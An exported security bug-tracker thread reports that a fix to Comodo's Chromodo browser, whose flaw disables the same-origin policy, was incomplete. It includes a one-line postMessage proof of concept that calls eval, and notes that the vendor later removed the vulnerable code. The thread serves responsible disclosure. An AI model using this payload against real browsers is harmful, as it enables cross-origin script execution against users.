Comodo: Comodo "Chromodo" Browser disables same origin policy, Effectively turning off web security.

GoogleCodeExporter commented 8 years ago

Comodo's fix for issue 704 was incomplete, it's trivial to make the exploit 
work again like this:

window.postMessage(JSON.stringify({ command: "callOuterFunction", params: { 
func: "eval", arguments: ["alert(1)"] }}), "*");

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by tav...@google.com on 2 Feb 2016 at 6:51

Blocked on: #704

GoogleCodeExporter commented 8 years ago

Original comment by tav...@google.com on 2 Feb 2016 at 6:53

Now blocked on: #704

GoogleCodeExporter commented 8 years ago

Looks like Comodo have pushed out a fix that completely removes the vulnerable 
code.

Original comment by tav...@google.com on 5 Feb 2016 at 10:25

Changed state: Fixed
Removed labels: Restrict-View-Commit

ArashAll / google-security-research

Comodo: Comodo "Chromodo" Browser disables same origin policy, Effectively turning off web security. #713